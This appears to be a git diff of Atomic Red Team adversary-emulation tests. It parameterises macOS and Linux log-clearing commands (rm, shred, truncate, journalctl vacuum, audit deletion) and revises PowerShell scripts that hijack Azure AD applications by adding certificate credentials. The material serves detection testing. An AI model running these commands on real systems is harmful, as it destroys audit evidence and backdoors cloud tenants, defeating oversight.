+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ system_log_folder:
+ description: path to log parent folder
+ type: string
+ default: "/var/log/"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path} #{system_log_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path}
+ #{system_log_folder}/system.log
+
+ '
executor:
command: |
- sudo srm /var/log/system.log #system log file deletion
- sudo srm -r /var/log/ #recursive deletion of log files
+ sudo srm #{system_log_path} #system log file deletion
+ sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
@@ -3184,8 +3322,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
+ command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator
privileges''
'
@@ -3199,8 +3353,24 @@ defense-evasion:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
+ command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"''
'
name: sh
diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md
index a78329a3..0f0d214d 100644
--- a/atomics/T1070.002/T1070.002.md
+++ b/atomics/T1070.002/T1070.002.md
@@ -58,18 +58,37 @@ Delete system and audit logs
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| syslog_path | path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. | string | /var/log/system.log|
+| macos_audit_path | path of audit file to delete | string | /var/audit/20220725213300.202208110700021|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo rm -rf /private/var/log/system.log*
-sudo rm -rf /private/var/audit/*
+sudo rm -rf #{syslog_path}
+if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{syslog_path}
+if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
+```
+
+
@@ -94,7 +113,6 @@ This test deletes main log datastore, inflight log data, time-to-live data(TTL),
```sh
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
-sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
```
@@ -117,18 +135,35 @@ This test truncates the system log files using the truncate utility with (-s 0 o
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path of system log to delete. | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo truncate -s 0 /var/log/system.log #size parameter shorthand
-sudo truncate --size=0 /var/log/system.log #size parameter
+sudo truncate -s 0 #{system_log_path} #size parameter shorthand
+sudo truncate --size=0 #{system_log_path} #size parameter
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -146,18 +181,35 @@ The first sub-test truncates the log file to zero bytes via /dev/null and the se
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path of system log to delete. | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
-sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -175,19 +227,38 @@ This test finds and deletes the system log files within /var/log/ directory usin
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_name1 | name or prefix of system log to delete. | string | system.log|
+| system_log_name2 | name or prefix of system log to delete. | string | system.log.97.gz|
+| system_log_name3 | name or prefix of system log to delete. | string | system.log.98.gz|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
-sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
-sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
+```
+##### Get Prereq Commands:
+```sh
+touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
+```
+
+
@@ -205,12 +276,17 @@ This test overwrites the contents of system log file with an empty string using
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo echo '' > /var/log/system.log
+sudo echo '' > #{system_log_path}
```
@@ -261,17 +337,34 @@ This test deletes the system log file using unlink utility
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo unlink /var/log/system.log
+sudo unlink #{system_log_path}
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -289,17 +382,34 @@ This test overwrites the contents of the log file with zero bytes(-z) using thre
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo shred -u -z -n 3 /var/log/system.log
+sudo shred -u -z -n 3 #{system_log_path}
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -319,18 +429,36 @@ Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+| system_log_folder | path to log parent folder | string | /var/log/|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo srm /var/log/system.log #system log file deletion
-sudo srm -r /var/log/ #recursive deletion of log files
+sudo srm #{system_log_path} #system log file deletion
+sudo srm -r #{system_log_folder} #recursive deletion of log files
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path} #{system_log_folder}
+```
+##### Get Prereq Commands:
+```sh
+mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
+```
+
+
@@ -348,17 +476,34 @@ This test deletes the system log file using osascript via "do shell script"(sh/b
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
+osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -378,17 +523,34 @@ Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| system_log_path | path to system.log | string | /var/log/system.log|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
+osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{system_log_path}
+```
+##### Get Prereq Commands:
+```sh
+touch #{system_log_path}
+```
+
+
@@ -406,18 +568,35 @@ The first sub-test deletes the journal files using rm utility in the "/var/log/j
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| journal_folder | path to journal logs | string | /var/log/journal|
+
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
-sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
```
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat #{journal_folder}
+```
+##### Get Prereq Commands:
+```sh
+mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+```
+
+
@@ -441,7 +620,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
| username | Username of mail spool | string | root|
-#### Attack Commands: Run with `bash`!
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
@@ -451,6 +630,18 @@ echo 0> /var/spool/mail/#{username}
+#### Dependencies: Run with `sh`!
+##### Description: target files must exist
+##### Check Prereq Commands:
+```sh
+stat /var/spool/mail/#{username}
+```
+##### Get Prereq Commands:
+```sh
+touch /var/spool/mail/#{username}
+```
+
+
@@ -474,13 +665,17 @@ This test overwrites the specified log. This technique was used by threat actor
| log_path | Path of specified log | path | /var/log/secure|
-#### Attack Commands: Run with `bash`!
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
echo 0> #{log_path}
```
+#### Cleanup Commands:
+```bash
+if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
+```
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml
index 4301a4f3..c58d7d06 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -8,10 +8,28 @@ atomic_tests:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/.
+ type: string
+ default: /var/log/system.log
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: /var/audit/20220725213300.202208110700021
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
@@ -24,7 +42,6 @@ atomic_tests:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -33,10 +50,23 @@ atomic_tests:
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo truncate -s 0 /var/log/system.log #size parameter shorthand
- sudo truncate --size=0 /var/log/system.log #size parameter
+ sudo truncate -s 0 #{system_log_path} #size parameter shorthand
+ sudo truncate --size=0 #{system_log_path} #size parameter
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -45,10 +75,23 @@ atomic_tests:
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
@@ -57,11 +100,32 @@ atomic_tests:
This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
supported_platforms:
- macos
+ input_arguments:
+ system_log_name1:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log
+ system_log_name2:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.97.gz
+ system_log_name3:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.98.gz
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
+ get_prereq_command: |
+ touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
executor:
command: |
- sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
- sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
- sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+ sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+ sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+ sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
@@ -70,9 +134,14 @@ atomic_tests:
This test overwrites the contents of system log file with an empty string using echo utility
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
executor:
command: |
- sudo echo '' > /var/log/system.log
+ sudo echo '' > #{system_log_path}
name: sh
elevation_required: true
- name: Real-time system log clearance/deletion
@@ -92,9 +161,22 @@ atomic_tests:
This test deletes the system log file using unlink utility
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo unlink /var/log/system.log
+ sudo unlink #{system_log_path}
name: sh
elevation_required: true
- name: Delete system log files using shred utility
@@ -103,9 +185,22 @@ atomic_tests:
This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- sudo shred -u -z -n 3 /var/log/system.log
+ sudo shred -u -z -n 3 #{system_log_path}
name: sh
elevation_required: true
- name: Delete system log files using srm utility
@@ -116,10 +211,27 @@ atomic_tests:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ system_log_folder:
+ description: path to log parent folder
+ type: string
+ default: /var/log/
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path} #{system_log_folder}
+ get_prereq_command: |
+ mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
executor:
command: |
- sudo srm /var/log/system.log #system log file deletion
- sudo srm -r /var/log/ #recursive deletion of log files
+ sudo srm #{system_log_path} #system log file deletion
+ sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
@@ -128,9 +240,22 @@ atomic_tests:
This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
+ osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
name: sh
elevation_required: true
- name: Delete system log files using Applescript
@@ -141,9 +266,22 @@ atomic_tests:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: /var/log/system.log
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{system_log_path}
+ get_prereq_command: |
+ touch #{system_log_path}
executor:
command: |
- osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
+ osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
@@ -152,9 +290,22 @@ atomic_tests:
The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
supported_platforms:
- linux
+ input_arguments:
+ journal_folder:
+ description: path to journal logs
+ type: string
+ default: /var/log/journal
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat #{journal_folder}
+ get_prereq_command: |
+ mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
executor:
command: |
- sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+ sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -169,7 +320,16 @@ atomic_tests:
description: Username of mail spool
type: string
default: root
+ dependency_executor_name: sh
+ dependencies:
+ - description: |
+ target files must exist
+ prereq_command: |
+ stat /var/spool/mail/#{username}
+ get_prereq_command: |
+ touch /var/spool/mail/#{username}
executor:
+ elevation_required: true
command: |
echo 0> /var/spool/mail/#{username}
name: bash
@@ -188,3 +348,6 @@ atomic_tests:
command: |
echo 0> #{log_path}
name: bash
+ elevation_required: true
+ cleanup_command: |
+ if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi
diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md
index b1150539..1eb42e11 100644
--- a/atomics/T1098.001/T1098.001.md
+++ b/atomics/T1098.001/T1098.001.md
@@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| service_principal_name | Name of the targeted service principal | string | SuperSP|
-| certificate_password | Password of the new certificate | string | Passw0rd|
-| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
-$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
-$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
-Write-Host "Generated certificate ""$thumb"""
-$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
-Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
-$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
-$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -94,7 +89,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
-rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
```
@@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| application_name | Name of the targeted application | string | SuperApp|
-| certificate_password | Password of the new certificate | string | Passw0rd|
-| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
-$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
-$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
-Write-Host "Generated certificate ""$thumb"""
-$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
-Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
-$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
-$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -188,7 +177,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
-rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
```
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
index b203d66d..ff5c5d8d 100644
--- a/atomics/T1098.001/T1098.001.yaml
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -22,14 +22,6 @@ atomic_tests:
description: Name of the targeted service principal
type: string
default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -49,21 +41,18 @@ atomic_tests:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
@@ -82,7 +71,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
- rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
@@ -107,14 +95,6 @@ atomic_tests:
description: Name of the targeted application
type: string
default: SuperApp
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: $env:TEMP
